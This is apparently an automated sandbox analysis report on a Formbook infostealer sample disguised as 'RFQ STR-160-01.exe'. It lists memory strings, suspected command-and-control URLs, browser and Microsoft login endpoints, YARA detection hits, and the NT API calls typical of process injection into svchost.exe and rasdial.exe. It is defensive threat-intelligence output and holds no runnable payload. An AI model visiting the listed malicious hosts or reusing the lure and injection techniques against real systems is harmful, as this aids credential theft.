            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.4
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.4
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.4
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.4
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/uploads/2021/09/fondo-plumber-1000x429-1.jpg
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.00000000063D2000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.00000000064C2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4003574545.000000000799C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.anaidittrich.com
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4003574545.000000000799C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.anaidittrich.com/qpwk/
            Source: rasdial.exe, 00000007.00000002.3996789330.00000000064C2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.redhat.com/
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.00000000063D2000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.00000000064C2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.redhat.com/docs/manuals/enterprise/
            Source: rasdial.exe, 00000007.00000002.3996789330.0000000006330000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.xforum.tech/647x/?rZwP=sHyxifGPIFN&cLqL3H=FnaXBox54
            Source: rasdial.exe, 00000007.00000002.3998426651.00000000081BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://api.w.org/
            Source: rasdial.exe, 00000007.00000002.3998426651.00000000081BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: rasdial.exe, 00000007.00000002.3998426651.00000000081BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: rasdial.exe, 00000007.00000002.3998426651.00000000081BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: rasdial.exe, 00000007.00000002.3998426651.00000000081BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: rasdial.exe, 00000007.00000002.3998426651.00000000081BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: rasdial.exe, 00000007.00000002.3998426651.00000000081BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://es.wordpress.org/
            Source: rasdial.exe, 00000007.00000002.3990288886.0000000003345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: rasdial.exe, 00000007.00000003.2663326685.0000000008197000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: rasdial.exe, 00000007.00000002.3990288886.0000000003345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: rasdial.exe, 00000007.00000002.3990288886.0000000003345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: rasdial.exe, 00000007.00000002.3990288886.0000000003345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: rasdial.exe, 00000007.00000002.3990288886.0000000003345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: rasdial.exe, 00000007.00000002.3990288886.0000000003345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/2021/08/30/hola-mundo/
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/2021/08/30/hola-mundo/#comment-1
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/acerca-de/
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/blog/
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/comments/feed/
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/contacto/
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/feed/
            Source: rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/wp-json/
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/xmlrpc.php?rsd
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.00000000066F6000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.00000000067E6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://tilda.cc
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/wordpress
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://wordpress.org/
            Source: rasdial.exe, 00000007.00000002.3998426651.00000000081BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.instagram.com/explore/tags/wordcamp/
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_0060EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0060EAFF
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_0060ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0060ED6A
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_0060EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0060EAFF
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_005FAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_005FAA57
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_00629576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00629576

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3990076785.0000000003060000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4003574545.0000000007920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490399894.00000000038A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3995129739.0000000004D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490106320.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3994994966.0000000003430000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490739625.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3995137235.0000000004360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3990076785.0000000003060000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4003574545.0000000007920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2490399894.00000000038A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3995129739.0000000004D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2490106320.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3994994966.0000000003430000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2490739625.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3995137235.0000000004360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: RFQ STR-160-01.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: RFQ STR-160-01.exe, 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a61ddb70-9
            Source: RFQ STR-160-01.exe, 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_bec1f502-b
            Source: RFQ STR-160-01.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_895266e3-0
            Source: RFQ STR-160-01.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_1b33b45f-0
            Source: initial sampleStatic PE information: Filename: RFQ STR-160-01.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C1A3 NtClose,2_2_0042C1A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972B60 NtClose,LdrInitializeThunk,2_2_03972B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03972DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03972C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039735C0 NtCreateMutant,LdrInitializeThunk,2_2_039735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974340 NtSetContextThread,2_2_03974340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974650 NtSuspendThread,2_2_03974650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972B80 NtQueryInformationFile,2_2_03972B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BA0 NtEnumerateValueKey,2_2_03972BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BF0 NtAllocateVirtualMemory,2_2_03972BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BE0 NtQueryValueKey,2_2_03972BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AB0 NtWaitForSingleObject,2_2_03972AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AD0 NtReadFile,2_2_03972AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AF0 NtWriteFile,2_2_03972AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F90 NtProtectVirtualMemory,2_2_03972F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FB0 NtResumeThread,2_2_03972FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FA0 NtQuerySection,2_2_03972FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FE0 NtCreateFile,2_2_03972FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F30 NtCreateSection,2_2_03972F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F60 NtCreateProcessEx,2_2_03972F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E80 NtReadVirtualMemory,2_2_03972E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EA0 NtAdjustPrivilegesToken,2_2_03972EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EE0 NtQueueApcThread,2_2_03972EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E30 NtWriteVirtualMemory,2_2_03972E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DB0 NtEnumerateKey,2_2_03972DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DD0 NtDelayExecution,2_2_03972DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D10 NtMapViewOfSection,2_2_03972D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D00 NtSetInformationFile,2_2_03972D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D30 NtUnmapViewOfSection,2_2_03972D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CA0 NtQueryInformationToken,2_2_03972CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CC0 NtQueryVirtualMemory,2_2_03972CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CF0 NtOpenProcess,2_2_03972CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C00 NtQueryInformationProcess,2_2_03972C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C60 NtCreateKey,2_2_03972C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973090 NtSetValueKey,2_2_03973090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973010 NtOpenDirectoryObject,2_2_03973010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039739B0 NtGetContextThread,2_2_039739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973D10 NtOpenProcessToken,2_2_03973D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973D70 NtOpenThread,2_2_03973D70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05024650 NtSuspendThread,LdrInitializeThunk,7_2_05024650
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05024340 NtSetContextThread,LdrInitializeThunk,7_2_05024340
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022D10 NtMapViewOfSection,LdrInitializeThunk,7_2_05022D10
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_05022D30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022DD0 NtDelayExecution,LdrInitializeThunk,7_2_05022DD0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_05022DF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022C60 NtCreateKey,LdrInitializeThunk,7_2_05022C60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_05022C70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_05022CA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022F30 NtCreateSection,LdrInitializeThunk,7_2_05022F30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022FB0 NtResumeThread,LdrInitializeThunk,7_2_05022FB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022FE0 NtCreateFile,LdrInitializeThunk,7_2_05022FE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_05022E80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022EE0 NtQueueApcThread,LdrInitializeThunk,7_2_05022EE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022B60 NtClose,LdrInitializeThunk,7_2_05022B60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_05022BA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022BE0 NtQueryValueKey,LdrInitializeThunk,7_2_05022BE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_05022BF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022AD0 NtReadFile,LdrInitializeThunk,7_2_05022AD0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022AF0 NtWriteFile,LdrInitializeThunk,7_2_05022AF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050235C0 NtCreateMutant,LdrInitializeThunk,7_2_050235C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_050239B0 NtGetContextThread,LdrInitializeThunk,7_2_050239B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022D00 NtSetInformationFile,7_2_05022D00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022DB0 NtEnumerateKey,7_2_05022DB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022C00 NtQueryInformationProcess,7_2_05022C00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022CC0 NtQueryVirtualMemory,7_2_05022CC0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022CF0 NtOpenProcess,7_2_05022CF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022F60 NtCreateProcessEx,7_2_05022F60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022F90 NtProtectVirtualMemory,7_2_05022F90
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022FA0 NtQuerySection,7_2_05022FA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022E30 NtWriteVirtualMemory,7_2_05022E30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022EA0 NtAdjustPrivilegesToken,7_2_05022EA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022B80 NtQueryInformationFile,7_2_05022B80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05022AB0 NtWaitForSingleObject,7_2_05022AB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05023010 NtOpenDirectoryObject,7_2_05023010
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05023090 NtSetValueKey,7_2_05023090
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05023D10 NtOpenProcessToken,7_2_05023D10
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_05023D70 NtOpenThread,7_2_05023D70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 7_2_03088F00 NtReadFile,7_2_03088F00
